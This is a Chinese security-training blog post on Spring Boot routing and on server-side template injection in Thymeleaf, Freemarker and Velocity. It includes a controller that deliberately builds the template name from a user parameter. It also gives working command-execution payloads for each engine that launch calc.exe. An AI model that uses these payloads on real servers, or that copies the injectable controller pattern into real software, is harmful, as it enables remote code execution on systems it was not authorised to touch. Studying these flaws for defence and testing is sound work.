Web开发-JavaEE应用&SpringBoot栈&模版注入&Thymeleaf&Freemarker&Velocity

SuperherRo2025-05-01 13:21

知识点:

1、安全开发-JavaEE-开发框架-SpringBoot&路由&传参

2、安全开发-JavaEE-模版引擎-Thymeleaf&Freemarker&Velocity

一、演示案例-WEB开发-JavaEE-开发框架-SpringBoot&路由&传参

类似于php语言中的thinkphp,不过要更加优秀。

参考:https://springdoc.cn/spring-boot/













1、路由映射

bash 复制代码 
@RequestMapping @GetMapping等

2、参数传递

bash 复制代码 
@RequestParam

3、数据响应

bash 复制代码 
@RestController @Controller(请求)
@RestController注解相当于@ResponseBody(响应)+@Controller(请求)合作用。










二、演示案例-WEB开发-JavaEE-模版引擎-Thymeleaf&Freemarker&Velocity

Thymeleaf

参考:https://xz.aliyun.com/news/9962

1、新建SpringBoot项目包含Web,Thymeleaf



2、配置application.properties修改缓存

3、创建模版目录和文件,文件定义修改变量



4、新建Controller目录及文件,指定路由配置









5、更换SpringBoot及Thymeleaf版本测试POC

bash 复制代码 
@Controller
public class IndexController {
    @RequestMapping("/index")
    public String index(Model model) {
//替换模版html文件中的data变量值
model.addAttribute("data", "你好 小迪");
//使用index模版文件
        return "index";
    }




bash 复制代码 
    @RequestMapping("/indexs")
    public String index(Model model,@RequestParam String lang) {
//替换模版html文件中的data变量值
model.addAttribute("data", "Hello xiaodi");
//使用index+变量lang模版文件
        return "index-"+lang;
    }
}



bash 复制代码 
利用条件:Thymeleaf漏洞版本,可控渲染模版文件
Poc:__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22calc.exe%22).getInputStream()).next()%7d__::.x





Freemarker

参考:https://mp.weixin.qq.com/s/TtNxfSYsB4HMEpW_OBniew

1、新建SpringBoot项目包含Web,Freemarker



2、配置application.properties修改缓存

3、创建模版目录和文件,文件定义修改变量


4、新建Controller目录及文件,指定路由配置






5、更换SpringBoot及Freemarker版本测试POC

bash 复制代码 
 <#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}





bash 复制代码 
<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc.exe").start()}

<#assign value="freemarker.template.utility.JythonRuntime"?new()>${value("calc.exe")}<@value>import os;os.system("calc.exe")</@value>//@value为自定义标签

利用条件:可控渲染的模版文件

Velocity


参考:https://blog.csdn.net/2401_83799022/article/details/141600988

bash 复制代码 
<dependency>
    <groupId>org.apache.velocity</groupId>
    <artifactId>velocity</artifactId>
    <version>1.7</version>
</dependency>



bash 复制代码 
Poc:%23set($e%3D"e")$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc")
bash 复制代码 
利用条件:Velocity漏洞版本,可控模版变量或文件


相关推荐
还在忙碌的吴小二3 小时前
Harness 最佳实践:Java Spring Boot 项目落地 OpenSpec + Claude Code
java·开发语言·spring boot·后端·spring
ai产品老杨4 小时前
异构计算时代的视频底座:基于 ZLMediaKit 与 Spring Boot 的 X86/ARM 跨平台架构解析
arm开发·spring boot·音视频
老神在在0014 小时前
Spring Boot 全局异常处理器(GlobalExceptionHandler)
spring boot·spring·java-ee·状态模式·
han_hanker5 小时前
@GetMapping @PostMapping @DeleteMapping @PutMapping
spring boot
han_hanker6 小时前
@Validated @Valid 用法
java·spring boot
言慢行善6 小时前
SpringBoot中的注解介绍
java·spring boot·后端
许杰小刀7 小时前
MyBatis-Plus实战:Spring Boot数据库操作效率提升10倍
数据库·spring boot·mybatis
霸道流氓气质9 小时前
SpringBoot中使用SpringAIAlibaba框架集成阿里云百炼实现AI快速对话入门示例
人工智能·spring boot·阿里云
认真的小羽❅9 小时前
从入门到精通:Spring Boot 整合 MyBatis 全攻略
spring boot·后端·mybatis
热门推荐
01GitHub 镜像站点02一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛03OpenClaw 请求超时 llm request timed out 怎么解决?3 种方案实测,附完整排查流程04VMware Workstation Pro 17 虚拟机完整安装教程(2026最新)05AI 编程效率翻倍:Superpowers Skills 上手清单 + 完整指南06【STM32】HAL库 CubeMX 教程 --- 通用定时器 TIM2 定时07Oh My Codex 快速使用指南08实测!Gemma 4 成功跑在安卓手机上:离线 AI 助手终于来了09CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南10UV安装并设置国内源